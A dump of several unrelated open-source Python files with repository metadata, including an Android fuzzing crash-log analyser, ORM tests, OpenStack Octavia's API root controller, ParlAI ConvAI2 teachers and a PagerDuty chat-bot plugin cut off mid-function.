# split the target_stack into sub exception traces
sub_exception_stacks: Dict[str, List[str]] = {}
for line in target_stack:
res = [i for i in range(len(line)) if line.startswith(':', i)]
print(line)
if len(res) < 3:
# special handling for the case like
# "AndroidRuntime: at android.os.BinderProxy.transactNative(Native Method)"
continue
else:
local_time_label = line[0:res[2]] # the third ":" is the split point
if local_time_label not in sub_exception_stacks:
sub_exception_stacks[local_time_label] = [line]
else:
sub_exception_stacks[local_time_label].append(line)
for local_time_label in sub_exception_stacks:
if "AndroidRuntime" in local_time_label or "ACRA" in local_time_label \
or "CustomActivityOnCrash" in local_time_label \
or "CrashAnrDetector" in local_time_label:
# focus on "AndroidRuntime" bugs
pass
else:
continue
                                    unique_signature_of_crash_stack = ""
                                    sub_exception_stack = sub_exception_stacks[local_time_label]
                                    for line in sub_exception_stack:
                                        if "at " in line and app_package_name in line:
                                            line_without_time_label = line.replace(local_time_label + ":", "").strip()
                                            unique_signature_of_crash_stack += line_without_time_label
                                    if unique_signature_of_crash_stack == "":
                                        continue
                                    print("\n-- signature --")
                                    print(unique_signature_of_crash_stack)
                                    print("----")
                                    if apk_file_name not in other_crashes_signature_str_dict:
                                        other_crashes_signature_str_dict[apk_file_name] = [
                                            unique_signature_of_crash_stack]
                                        other_crashes_complete_exception_trace_dict[apk_file_name] = [
                                            sub_exception_stack]
                                    else:
                                        if unique_signature_of_crash_stack not in other_crashes_signature_str_dict[
                                                apk_file_name]:
                                            # only record signatures we have not seen before
                                            other_crashes_signature_str_dict[apk_file_name].append(
                                                unique_signature_of_crash_stack)
                                            other_crashes_complete_exception_trace_dict[apk_file_name].append(
                                                sub_exception_stack)
else:
                                target_stack = crash_stack_traces[time_label]
                                unique_signature_of_crash_stack = ""
                                if "AndroidRuntime" in time_label or "ACRA" in time_label \
                                        or "CustomActivityOnCrash" in time_label \
                                        or "CrashAnrDetector" in time_label:
                                    # focus on "AndroidRuntime" bugs
                                    pass
                                else:
                                    continue
                                for line in target_stack:
                                    if "at " in line and app_package_name in line:
                                        line_without_time_label = line.replace(time_label + ":", "").strip()
                                        unique_signature_of_crash_stack += line_without_time_label
                                if unique_signature_of_crash_stack == "":
                                    continue
                                print("\n-- signature --")
                                print(unique_signature_of_crash_stack)
                                print("----")
                                if apk_file_name not in other_crashes_signature_str_dict:
                                    other_crashes_signature_str_dict[apk_file_name] = [unique_signature_of_crash_stack]
                                    other_crashes_complete_exception_trace_dict[apk_file_name] = [target_stack]
                                else:
                                    if unique_signature_of_crash_stack not in other_crashes_signature_str_dict[
                                            apk_file_name]:
                                        # only record signatures we have not seen before
                                        other_crashes_signature_str_dict[apk_file_name].append(
                                            unique_signature_of_crash_stack)
                                        other_crashes_complete_exception_trace_dict[apk_file_name].append(target_stack)
# print("--")
# print(len(set(other_crashes_dict[app_name])))
# print(other_crashes_dict[app_name])
# print("--")
if apk_file_name in other_crashes_signature_str_dict:
number_of_unique_other_crashes = len(set(other_crashes_signature_str_dict[apk_file_name]))
print("#unique other crashes: %d" % number_of_unique_other_crashes)
else:
number_of_unique_other_crashes = 0
# output to final result file
if args.final_result_csv_file_path is not None:
                        with open(args.final_result_csv_file_path, "a") as csv_file:
                            writer = csv.writer(csv_file)
                            writer.writerow([apk_file_name, issue_id, os.path.basename(result_dir),
                                             number_of_unique_other_crashes])
else:
                    # check for target crashes (i.e., the critical crashes we care about)
number_of_matched_crash = 0
crash_triggering_time_durations = []
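                    # a stack trace counts as the target crash only if every signature
                    # substring of this issue appears somewhere in the trace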
for time_label in crash_stack_traces:
target_stack = crash_stack_traces[time_label]
is_matched = True
for signature_str in crash_signature_strs:
exist = False
for line in target_stack:
if signature_str in line:
exist = True
break
if exist:
continue
else:
is_matched = False
break
if is_matched:
# compute the time duration to trigger the crash
if args.timemachine:
# print("time label: %s" % time_label)
matched_datetime_str = time_label.replace("[", "").replace("]", "")
crash_triggering_datetime_obj = datetime.datetime.strptime(matched_datetime_str,
'%Y-%m-%d-%H:%M:%S')
                            else:
                                # logcat timestamps carry no year, so one is assumed here
                                matched_datetime_str = "2020-" + time_label.split('.')[0]
crash_triggering_datetime_obj = datetime.datetime.strptime(matched_datetime_str,
'%Y-%m-%d %H:%M:%S')
tmp_time_duration_in_minutes = (
crash_triggering_datetime_obj - start_testing_datetime_obj).total_seconds() / 60
crash_triggering_time_durations.append("{:.0f}".format(tmp_time_duration_in_minutes))
number_of_matched_crash += 1
if number_of_matched_crash > 0:
print(log_tag_name + "the crash was triggered (%d) times" % number_of_matched_crash)
print(log_tag_name + "the time duration: %s (mins)" % crash_triggering_time_durations)
# if args.v:
# print('---')
# # verbose mode
# print(output)
# print('---')
# output to final result file
if args.final_result_csv_file_path is not None:
if not args.simple_format:
                                with open(args.final_result_csv_file_path, "a") as csv_file:
                                    writer = csv.writer(csv_file)
                                    writer.writerow([app_name, issue_id, os.path.basename(result_dir),
                                                     len(crash_triggering_time_durations)])
                                    for time_duration in crash_triggering_time_durations:
                                        writer.writerow(["", "", "", time_duration])
else:
if len(crash_triggering_time_durations) > 0:
                                    # simple format: only output triggered bugs and their first triggering time
                                    with open(args.final_result_csv_file_path, "a") as csv_file:
                                        writer = csv.writer(csv_file)
                                        writer.writerow([app_name, issue_id, os.path.basename(result_dir),
                                                         len(crash_triggering_time_durations),
                                                         crash_triggering_time_durations[0]])
else:
print('\n')
print(log_tag_name + 'scanning (%s) ' % os.path.basename(result_dir))
print(log_tag_name + "Warning: logcat file or testing time file in (%s) does not exist!" %
os.path.basename(result_dir))
continue
if args.other_crashes:
total_number_of_other_crashes = 0
for apk_file_name in other_crashes_signature_str_dict:
print("%s: %d" % (apk_file_name, len(set(other_crashes_signature_str_dict[apk_file_name]))))
total_number_of_other_crashes += len(set(other_crashes_signature_str_dict[apk_file_name]))
print("#total other crashes: %d" % total_number_of_other_crashes)
# output the complete stack traces of all the other crashes (i.e., non-target crashes)
tmp_output_dir = os.path.join(args.o, "other_crashes")
if os.path.exists(tmp_output_dir):
shutil.rmtree(tmp_output_dir)
for apk_file_name in other_crashes_complete_exception_trace_dict:
print("dump complete crash stack for: %s" % apk_file_name)
tmp_output_dir_of_each_apk = os.path.join(tmp_output_dir, apk_file_name)
if not os.path.exists(tmp_output_dir_of_each_apk):
os.makedirs(tmp_output_dir_of_each_apk)
stack_traces: List[List[str]] = other_crashes_complete_exception_trace_dict[apk_file_name]
file_index = 0
for stack_trace in stack_traces:
tmp_file_path = os.path.join(tmp_output_dir_of_each_apk, "crash_stack_" + str(file_index) + ".txt")
file_index += 1
                with open(tmp_file_path, "w") as tmp_file:
                    for line in stack_trace:
                        tmp_file.write(line)
if __name__ == '__main__':
ap = ArgumentParser()
ap.add_argument('-o', required=True, help="the output directory of testing results")
ap.add_argument('-v', default=False, action='store_true')
# supported fuzzing tools
ap.add_argument('--monkey', default=False, action='store_true')
ap.add_argument('--ape', default=False, action='store_true')
ap.add_argument('--timemachine', default=False, action='store_true')
ap.add_argument('--combo', default=False, action='store_true')
ap.add_argument('--humanoid', default=False, action='store_true')
ap.add_argument('--sapienz', default=False, action='store_true')
ap.add_argument('--qtesting', default=False, action='store_true')
ap.add_argument('--weighted', default=False, action='store_true')
ap.add_argument('--fastbot', default=False, action='store_true')
ap.add_argument('--wetest', default=False, action='store_true')
ap.add_argument('--newmonkey', default=False, action='store_true')
    ap.add_argument('--app', type=str, dest='app_name', help="only check this app")
    ap.add_argument('--id', type=str, dest='issue_id', help="only check this issue id")
    ap.add_argument('--csv', type=str, dest='final_result_csv_file_path',
                    help="path of the csv file to which final results are appended")
ap.add_argument('--simple', default=False, action='store_true', dest='simple_format',
help="standard output in a simple format")
ap.add_argument('--other_crashes', default=False, action='store_true', dest='other_crashes')
args = ap.parse_args()
if not os.path.exists(args.o):
ap.error("Error: the output directory does not exist!")
if args.final_result_csv_file_path is not None and os.path.exists(args.final_result_csv_file_path):
os.remove(args.final_result_csv_file_path)
main(args)
|
888d2418623333eaf2c6b92cebe80b22f8998ea7
|
645a7db93e9d7a4f3074ad482a1f57071556d2c4
|
/tests/test_module.py
|
5f802818c8ceb865432f077116791fe29ef648b4
|
[
"Apache-2.0"
] |
permissive
|
monobot/asyncorm
|
852152c08b2dca3020699588bb675b188c1b89f3
|
6342e2d5fbaa22fb368aead772ac4f255df7562a
|
refs/heads/development
| 2023-07-20T09:17:00.568299
| 2020-08-20T10:30:30
| 2020-08-20T10:30:30
| 82,396,221
| 207
| 20
|
NOASSERTION
| 2023-07-07T03:01:37
| 2017-02-18T15:31:32
|
Python
|
UTF-8
|
Python
| false
| false
| 2,159
|
py
|
test_module.py
|
from asyncorm.application.configure import configure_orm, get_model, orm_app
from asyncorm.exceptions import AsyncOrmAppError, AsyncOrmModelError, AsyncOrmModelNotDefined
from asyncorm.test_case import AsyncormTestCase
Book = get_model("Book")
db_config = {"database": "asyncorm", "host": "localhost", "user": "ormdbuser", "password": "ormDbPass"}
class ModuleTests(AsyncormTestCase):
def test_ormconfigure_no_models(self):
orm = configure_orm({"db_config": db_config, "apps": None})
with self.assertRaises(AsyncOrmAppError) as exc:
orm.get_model("here.what")
self.assertTrue("There are no apps declared in the orm" == exc.exception.args[0])
def test_ormconfigure_no_db_config(self):
with self.assertRaises(AsyncOrmAppError) as exc:
configure_orm({"apps": ["tests.app_1", "tests.app_2"]})
self.assertIn("Imposible to configure without database", exc.exception.args[0])
def test_get_model_not_correct_format(self):
orm = configure_orm({"db_config": db_config, "apps": ["tests.app_1", "tests.app_2"]})
with self.assertRaises(AsyncOrmModelError) as exc:
orm.get_model("here.there.what")
self.assertIn("The string declared should be in format ", exc.exception.args[0])
def test_get_model_model_does_not_exist(self):
with self.assertRaises(AsyncOrmModelNotDefined) as exc:
get_model("Tato")
self.assertIn("The model does not exists", exc.exception.args[0])
def test_the_data_is_persistent_db_backend(self):
        # the orm is configured at the start of the tests, but the data is kept
self.assertEqual(orm_app.db_backend._connection_data["password"], db_config["password"])
def test_the_data_is_persistent_database(self):
self.assertEqual(orm_app.db_backend._connection_data["database"], db_config["database"])
def test_the_data_is_persistent_orm_model(self):
configure_orm({"db_config": db_config, "apps": ["tests.app_1.appo", "tests.app_2"]})
# every model declared has the same db_backend
self.assertTrue(orm_app.db_backend is Book.objects.db_backend)
|
89e3b77cf75c7caa4f7f50044409c441ee040e95
|
2337351b228818e41be3002bd38f68f77c2aa074
|
/services/card/cards/path.py
|
728c7d9171e2e2bdc88b59dc88b497f72afa700f
|
[
"BSD-3-Clause"
] |
permissive
|
nocproject/noc
|
57d40c680a1499374463e472434f9595ed6d1374
|
6e6d71574e9b9d822bec572cc629a0ea73604a59
|
refs/heads/master
| 2023-08-31T01:11:33.544573
| 2023-08-30T17:31:11
| 2023-08-30T17:31:11
| 107,815,776
| 105
| 33
|
BSD-3-Clause
| 2023-07-31T07:57:45
| 2017-10-21T21:04:33
|
Python
|
UTF-8
|
Python
| false
| false
| 1,585
|
py
|
path.py
|
# ----------------------------------------------------------------------
# Path
# ----------------------------------------------------------------------
# Copyright (C) 2007-2017 The NOC Project
# See LICENSE for details
# ----------------------------------------------------------------------
# Third-party modules
import orjson
# NOC modules
from .base import BaseCard
from noc.sa.models.managedobject import ManagedObject
from noc.core.topology.path import get_shortest_path
from noc.core.comp import smart_text
class PathCard(BaseCard):
name = "path"
default_template_name = "path"
card_css = ["/ui/pkg/leaflet/leaflet.css", "/ui/card/css/path.css"]
card_js = ["/ui/pkg/leaflet/leaflet.js", "/ui/card/js/path.js"]
def get_data(self):
        mo1, mo2 = self.id.split("-")
mo1 = ManagedObject.get_by_id(int(mo1)) if mo1 else None
mo2 = ManagedObject.get_by_id(int(mo2)) if mo2 else None
s_path = [mo1]
if mo1 and mo2:
try:
s_path = get_shortest_path(mo1, mo2)
except ValueError:
s_path = [mo1, mo2]
path = []
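        # merge consecutive hops that share the same (x, y) coordinates, so
        # co-located objects are rendered as a single point on the map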
for mo in s_path:
if not mo.x or not mo.y:
continue
if not path or mo.x != path[-1]["x"] or mo.y != path[-1]["y"]:
path += [{"x": mo.x, "y": mo.y, "objects": [{"id": mo.id, "name": mo.name}]}]
else:
path[-1]["objects"] += [{"id": mo.id, "name": mo.name}]
return {"mo1": mo1, "mo2": mo2, "path": smart_text(orjson.dumps(path))}
|
88576daf8b12aec26af13483581aee6d5c129700
|
99199db3f78a344e72b281c71c690518ae07375a
|
/octavia/api/root_controller.py
|
272fad78d1602b51c17dec99dd9114fdb4374762
|
[
"Apache-2.0"
] |
permissive
|
openstack/octavia
|
3faf2afe2ade5bd3978bb3a0558d2eeefc648ba2
|
0426285a41464a5015494584f109eed35a0d44db
|
refs/heads/master
| 2023-09-01T20:12:48.272344
| 2023-08-31T17:24:04
| 2023-08-31T17:24:04
| 21,018,188
| 147
| 180
|
Apache-2.0
| 2021-03-30T12:34:30
| 2014-06-19T22:47:19
|
Python
|
UTF-8
|
Python
| false
| false
| 6,862
|
py
|
root_controller.py
|
# Copyright 2014 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_middleware import healthcheck
from pecan import abort as pecan_abort
from pecan import expose as pecan_expose
from pecan import request as pecan_request
from wsme import types as wtypes
from wsmeext import pecan as wsme_pecan
from octavia.api.v2 import controllers as v2_controller
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class RootController(object):
"""The controller with which the pecan wsgi app should be created."""
def __init__(self):
super().__init__()
setattr(self, 'v2.0', v2_controller.V2Controller())
setattr(self, 'v2', v2_controller.V2Controller())
if CONF.api_settings.healthcheck_enabled:
self.healthcheck_obj = healthcheck.Healthcheck.app_factory(None)
# Run the oslo middleware healthcheck for /healthcheck
@pecan_expose('json')
@pecan_expose(content_type='text/plain')
@pecan_expose(content_type='text/html')
def healthcheck(self): # pylint: disable=inconsistent-return-statements
if CONF.api_settings.healthcheck_enabled:
if pecan_request.method not in ['GET', 'HEAD']:
pecan_abort(405)
return self.healthcheck_obj.process_request(pecan_request)
pecan_abort(404)
def _add_a_version(self, versions, version, url_version, status,
timestamp, base_url):
versions.append({
'id': version,
'status': status,
'updated': timestamp,
'links': [{
'href': base_url + url_version,
'rel': 'self'
}]
})
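    # each entry appended above is shaped like:
    #   {'id': 'v2.0', 'status': 'SUPPORTED', 'updated': '2016-12-11T00:00:00Z',
    #    'links': [{'href': '<base_url>v2', 'rel': 'self'}]}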
@wsme_pecan.wsexpose(wtypes.text)
def index(self):
host_url = pecan_request.path_url
if not host_url.endswith('/'):
host_url = '{}/'.format(host_url)
versions = []
self._add_a_version(versions, 'v2.0', 'v2', 'SUPPORTED',
'2016-12-11T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.1', 'v2', 'SUPPORTED',
'2018-04-20T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.2', 'v2', 'SUPPORTED',
'2018-07-31T00:00:00Z', host_url)
self._add_a_version(versions, 'v2.3', 'v2', 'SUPPORTED',
'2018-12-18T00:00:00Z', host_url)
# amp statistics
self._add_a_version(versions, 'v2.4', 'v2', 'SUPPORTED',
'2018-12-19T00:00:00Z', host_url)
# Tags
self._add_a_version(versions, 'v2.5', 'v2', 'SUPPORTED',
'2019-01-21T00:00:00Z', host_url)
# Flavors
self._add_a_version(versions, 'v2.6', 'v2', 'SUPPORTED',
'2019-01-25T00:00:00Z', host_url)
# Amphora Config update
self._add_a_version(versions, 'v2.7', 'v2', 'SUPPORTED',
'2018-01-25T12:00:00Z', host_url)
# TLS client authentication
self._add_a_version(versions, 'v2.8', 'v2', 'SUPPORTED',
'2019-02-12T00:00:00Z', host_url)
# HTTP Redirect code
self._add_a_version(versions, 'v2.9', 'v2', 'SUPPORTED',
'2019-03-04T00:00:00Z', host_url)
# Healthmonitor host header
self._add_a_version(versions, 'v2.10', 'v2', 'SUPPORTED',
'2019-03-05T00:00:00Z', host_url)
# Additive batch member update
self._add_a_version(versions, 'v2.11', 'v2', 'SUPPORTED',
'2019-06-24T00:00:00Z', host_url)
# VIP ACL
self._add_a_version(versions, 'v2.12', 'v2', 'SUPPORTED',
'2019-09-11T00:00:00Z', host_url)
# SOURCE_IP_PORT algorithm
self._add_a_version(versions, 'v2.13', 'v2', 'SUPPORTED',
'2019-09-13T00:00:00Z', host_url)
# Availability Zones
self._add_a_version(versions, 'v2.14', 'v2', 'SUPPORTED',
'2019-11-10T00:00:00Z', host_url)
# TLS cipher options
self._add_a_version(versions, 'v2.15', 'v2', 'SUPPORTED',
'2020-03-10T00:00:00Z', host_url)
# Additional UDP Healthcheck Types (HTTP/TCP)
self._add_a_version(versions, 'v2.16', 'v2', 'SUPPORTED',
'2020-03-15T00:00:00Z', host_url)
# Listener TLS versions
self._add_a_version(versions, 'v2.17', 'v2', 'SUPPORTED',
'2020-04-29T00:00:00Z', host_url)
# Pool TLS versions
self._add_a_version(versions, 'v2.18', 'v2', 'SUPPORTED',
'2020-04-29T01:00:00Z', host_url)
# Add quota support to octavia's l7policy and l7rule
self._add_a_version(versions, 'v2.19', 'v2', 'SUPPORTED',
'2020-05-12T00:00:00Z', host_url)
# ALPN protocols (listener)
self._add_a_version(versions, 'v2.20', 'v2', 'SUPPORTED',
'2020-08-02T00:00:00Z', host_url)
# Amphora delete
self._add_a_version(versions, 'v2.21', 'v2', 'SUPPORTED',
'2020-09-03T00:00:00Z', host_url)
# Add PROXYV2 pool protocol
self._add_a_version(versions, 'v2.22', 'v2', 'SUPPORTED',
'2020-09-04T00:00:00Z', host_url)
# SCTP protocol
self._add_a_version(versions, 'v2.23', 'v2', 'SUPPORTED',
'2020-09-07T00:00:00Z', host_url)
# ALPN protocols (pool)
self._add_a_version(versions, 'v2.24', 'v2', 'SUPPORTED',
'2020-10-15T00:00:00Z', host_url)
# PROMETHEUS listeners
self._add_a_version(versions, 'v2.25', 'v2', 'SUPPORTED',
'2021-10-02T00:00:00Z', host_url)
# Additional VIPs
self._add_a_version(versions, 'v2.26', 'v2', 'SUPPORTED',
'2022-08-29T00:00:00Z', host_url)
# HTTP Strict Transport Security (HSTS)
self._add_a_version(versions, 'v2.27', 'v2', 'CURRENT',
'2023-05-05T00:00:00Z', host_url)
return {'versions': versions}
|
3dbc3a391abb0d7c39f04a090698036730548e02
|
532ad1aedff8528b2e8af4e4e752f32d58b92b0d
|
/aesara/compile/compilelock.py
|
bdd895fff7ac68e0764a793ccfaeb9d48ec1b212
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
aesara-devs/aesara
|
ebaa204159d4ddb94ede10580c5b8e39d114713f
|
b5a3cf45f0f6762bb4bb0e2c657f7d3822c74595
|
refs/heads/main
| 2023-08-09T10:56:56.528283
| 2023-07-15T06:15:49
| 2023-07-15T13:28:29
| 221,231,590
| 861
| 142
|
NOASSERTION
| 2023-09-05T03:16:16
| 2019-11-12T14:02:08
|
Python
|
UTF-8
|
Python
| false
| false
| 2,041
|
py
|
compilelock.py
|
"""
Locking mechanism to ensure no two compilations occur simultaneously
in the same compilation directory (which can cause crashes).
"""
import os
import threading
from contextlib import contextmanager
from typing import Optional, Union
import filelock
from aesara.configdefaults import config
__all__ = [
"force_unlock",
"lock_ctx",
]
class ThreadFileLocks(threading.local):
def __init__(self):
self._locks = {}
local_mem = ThreadFileLocks()
def force_unlock(lock_dir: os.PathLike):
"""Forces the release of the lock on a specific directory.
Parameters
----------
lock_dir : os.PathLike
Path to a directory that was locked with `lock_ctx`.
"""
fl = filelock.FileLock(os.path.join(lock_dir, ".lock"))
fl.release(force=True)
dir_key = f"{lock_dir}-{os.getpid()}"
if dir_key in local_mem._locks:
del local_mem._locks[dir_key]
@contextmanager
def lock_ctx(
    lock_dir: Optional[Union[str, os.PathLike]] = None, *, timeout: Optional[float] = None
):
"""Context manager that wraps around FileLock and SoftFileLock from filelock package.
Parameters
----------
lock_dir
A directory for which to acquire the lock.
Defaults to `aesara.config.compiledir`.
timeout
Timeout in seconds for waiting in lock acquisition.
Defaults to `aesara.config.compile__timeout`.
"""
if lock_dir is None:
lock_dir = config.compiledir
if timeout is None:
timeout = config.compile__timeout
# locks are kept in a dictionary to account for changing compiledirs
dir_key = f"{lock_dir}-{os.getpid()}"
if dir_key not in local_mem._locks:
local_mem._locks[dir_key] = True
fl = filelock.FileLock(os.path.join(lock_dir, ".lock"))
fl.acquire(timeout=timeout)
try:
yield
finally:
if fl.is_locked:
fl.release()
if dir_key in local_mem._locks:
del local_mem._locks[dir_key]
else:
yield
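# A minimal usage sketch (lock_ctx() with no arguments locks
# `aesara.config.compiledir` for the duration of the block):
#
#   with lock_ctx():
#       ...  # compile into the locked directory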
|
eda48384b6609db04656ef39ac079f1291fcad71
|
1dbbb05b30d27c6419b9f34eea3b9a47f92582a0
|
/parlai/tasks/convai2/agents.py
|
6811226d64863c5959f3f884677247ffe66815ab
|
[
"MIT",
"CC-BY-4.0"
] |
permissive
|
facebookresearch/ParlAI
|
815334323d0ebef51bf9837336fe3eef6fe1655d
|
e1d899edfb92471552bae153f59ad30aa7fca468
|
refs/heads/main
| 2023-08-31T22:20:45.918129
| 2023-08-14T19:39:56
| 2023-08-14T19:39:56
| 89,266,735
| 10,943
| 2,395
|
MIT
| 2023-09-13T23:07:40
| 2017-04-24T17:10:44
|
Python
|
UTF-8
|
Python
| false
| false
| 7,372
|
py
|
agents.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.teachers import FbDeprecatedDialogTeacher, YamlTeacher
from parlai.utils.data import DatatypeHelper
from parlai.utils.misc import warn_once
from .build import build
from parlai.utils.strings import normalize_reply
import parlai.utils.logging as logging
from parlai.core.params import ParlaiParser
from typing import Optional
from parlai.core.opt import Opt
import copy
import os
'''All teachers have a version with and without label candidates. Each teacher
defaults to using a dataset with label candidates. To use a dataset without
label candidates, specify this using the task flag:
--task convai2:{TEACHER_NAME}:no_cands
where TEACHER_NAME is None, SelfOriginal (Self), or SelfRevised.
'''
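# For example (a sketch assuming ParlAI's usual snake_case-to-CamelCase teacher
# lookup): `--task convai2:self_original:no_cands` would select
# SelfOriginalTeacher without label candidates.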
def _path(opt, persona, use_cands):
# Build the data if it doesn't exist.
build(opt)
datatype = opt['datatype'].split(':')[0]
if datatype == 'test':
warn_once("WARNING: Test set not included. Setting datatype to valid.")
datatype = 'valid'
dt = datatype + '_' + persona
cands = '' if use_cands else '_no_cands'
return os.path.join(opt['datapath'], 'ConvAI2', dt + cands + '.txt')
class BothTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'both_original', use_cands)
super().__init__(opt, shared)
class NoneTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'none_original', use_cands)
super().__init__(opt, shared)
class SelfOriginalTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'self_original', use_cands)
super().__init__(opt, shared)
class SelfTeacher(SelfOriginalTeacher):
pass
class SelfRevisedTeacher(FbDeprecatedDialogTeacher):
def __init__(self, opt, shared=None):
opt = copy.deepcopy(opt)
try:
cands = opt['task'].split(":")[2]
use_cands = False if cands == 'no_cands' else True
except Exception:
use_cands = True
opt['datafile'] = _path(opt, 'self_revised', use_cands)
super().__init__(opt, shared)
class NormalizedTeacherTrait(object):
@classmethod
def add_cmdline_args(
cls, parser: ParlaiParser, partial_opt: Optional[Opt] = None
) -> ParlaiParser:
super().add_cmdline_args(parser, partial_opt)
agent = parser.add_argument_group('NormalizedTeacher arguments')
agent.add_argument(
'--your-persona-first',
type='bool',
default=True,
help="whether to prepend your persona followed by partner's persona. True by default to be consistent with the BothTeach",
)
agent.add_argument(
'--max-num-turns',
type=int,
default=-1,
help="first X turns per episode to show. If -1 then the whole episode is shown",
)
return agent
def __init__(self, opt, shared=None):
self.max_num_turns = opt["max_num_turns"]
self.your_persona_first = opt["your_persona_first"]
super().__init__(opt, shared)
def normalize_replies(self, x):
xs = x.split('\n')
your_personas = []
partner_personas = []
non_personas = []
for x in xs:
if x.startswith('your persona: '):
# Normalize the sentence appearing after 'your persona:'
x = x[len('your persona: ') :]
x = normalize_reply(x)
x = 'your persona: ' + x
your_personas.append(x)
elif x.startswith("partner's persona: "):
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
partner_personas.append(x)
else:
x = normalize_reply(x)
non_personas.append(x)
xs2 = []
if self.your_persona_first:
xs2.extend(your_personas)
xs2.extend(partner_personas)
else:
xs2.extend(partner_personas)
xs2.extend(your_personas)
xs2.extend(non_personas)
return '\n'.join(xs2)
def setup_data(self, path):
logging.info(f"loading normalized fbdialog data: {path}")
exs_counter = 0
for data, new_episode in super().setup_data(path):
text, labels, reward = data[:3]
candidates = None if len(data) == 3 else data[3]
if new_episode:
exs_counter = 0
if self.max_num_turns > 0 and exs_counter >= self.max_num_turns:
continue
text = self.normalize_replies(text)
labels = [self.normalize_replies(l) for l in labels]
exs_counter += 1
if candidates:
candidates = [self.normalize_replies(c) for c in candidates]
yield (text, labels, reward, candidates), new_episode
else:
yield (text, labels, reward), new_episode
class NormalizedTeacher(NormalizedTeacherTrait, SelfOriginalTeacher):
pass
class NormalizedBothTeacher(NormalizedTeacherTrait, BothTeacher):
pass
class NormalizedTheirTeacher(NormalizedTeacherTrait, BothTeacher):
def normalize_replies(self, x):
xs = x.split('\n')
xs2 = []
for x in xs:
if x.startswith('your persona: '):
continue
elif x.startswith("partner's persona: "):
x = x[len("partner's persona: ") :]
x = normalize_reply(x)
x = "partner's persona: " + x
else:
x = normalize_reply(x)
xs2.append(x)
return '\n'.join(xs2)
class NormalizedNoneTeacher(NormalizedTeacherTrait, NoneTeacher):
pass
class DefaultTeacher(SelfOriginalTeacher):
pass
class InteractiveTeacher(SelfOriginalTeacher):
# Dummy class to add arguments for interactive world.
pass
class SelfchatTeacher(SelfOriginalTeacher):
# Dummy class to add arguments for interactive world.
pass
class SampleTeacher(YamlTeacher):
"""
Loads the small sample of data created by the AutoTeacherTests.
"""
def __init__(self, opt, shared=None):
opt = opt.copy()
fold = DatatypeHelper.fold(opt['datatype'])
opt['datafile'] = os.path.join(
os.path.dirname(__file__), f'test/convai2_{fold}.yml'
)
super().__init__(opt, shared)
|
ce9bac8a2748531556b7be2b9ba6786c4ecaef7a
|
eb9f655206c43c12b497c667ba56a0d358b6bc3a
|
/python/testData/addImport/newLastImportInProjectGroup/main.py
|
1a5843fae36318c592afe2040220ab273ae3b9d4
|
[
"Apache-2.0"
] |
permissive
|
JetBrains/intellij-community
|
2ed226e200ecc17c037dcddd4a006de56cd43941
|
05dbd4575d01a213f3f4d69aa4968473f2536142
|
refs/heads/master
| 2023-09-03T17:06:37.560889
| 2023-09-03T11:51:00
| 2023-09-03T12:12:27
| 2,489,216
| 16,288
| 6,635
|
Apache-2.0
| 2023-09-12T07:41:58
| 2011-09-30T13:33:05
| null |
UTF-8
|
Python
| false
| false
| 37
|
py
|
main.py
|
import sys
import a
print(sys, a, b)
|
75ac83359fd3475438c009ca140ecbb9b99c2d0f
|
da5bcb4a92a802dedf84a74dc2ee4c08cb744656
|
/will/plugins/devops/pagerduty.py
|
d09a50b8ed1168006cab656753e775157c48ab9e
|
[
"MIT"
] |
permissive
|
skoczen/will
|
21981ba1213a49b650d661feb59d69719918446c
|
27a23ce47e3ec11b94f3355c2d2ee94c1958679c
|
refs/heads/master
| 2023-08-16T00:03:47.974919
| 2021-04-13T10:31:26
| 2021-04-13T10:31:26
| 14,900,247
| 359
| 186
|
MIT
| 2023-01-15T17:34:57
| 2013-12-03T17:08:08
|
Python
|
UTF-8
|
Python
| false
| false
| 7,356
|
py
|
pagerduty.py
|
from will.plugin import WillPlugin
from will.decorators import respond_to, periodic, hear, randomly, route, rendered_template, require_settings
from will import settings
import datetime
import pygerduty
class PagerDutyPlugin(WillPlugin):
@staticmethod
def _associate_pd_user(email_address, pager):
try:
user = next(pager.users.list(query=email_address, limit=1))
return user
except StopIteration:
return None
def _get_user_email_from_mention_name(self, mention_name):
try:
u = self.get_user_by_nick(mention_name[1:])
email_address = self.get_user(u['hipchat_id'])['email']
return email_address
except TypeError:
return None
def _update_incident(self, message, incidents, action, assign_to_email=None):
pager = pygerduty.PagerDuty(settings.PAGERDUTY_SUBDOMAIN, settings.PAGERDUTY_API_KEY)
email_address = self.get_user(message.sender['hipchat_id'])['email']
user = self._associate_pd_user(email_address, pager)
if user is None:
self.reply("I couldn't find your user :(")
return
# if incident(s) are given
if incidents:
for i in incidents:
# for specific incident, use show
try:
incident = pager.incidents.show(entity_id=i)
except pygerduty.BadRequest as e:
if e.code == 5001:
self.reply("Incident %s was not found." % i, color="yellow")
continue
if action == 'ack':
try:
incident.acknowledge(requester_id=user.id)
except pygerduty.BadRequest as e:
if e.code == 1001:
self.reply("%s has been already resolved." % i, color="yellow")
continue
elif action == 'resolve':
try:
incident.resolve(requester_id=user.id)
except pygerduty.BadRequest as e:
if e.code == 1001:
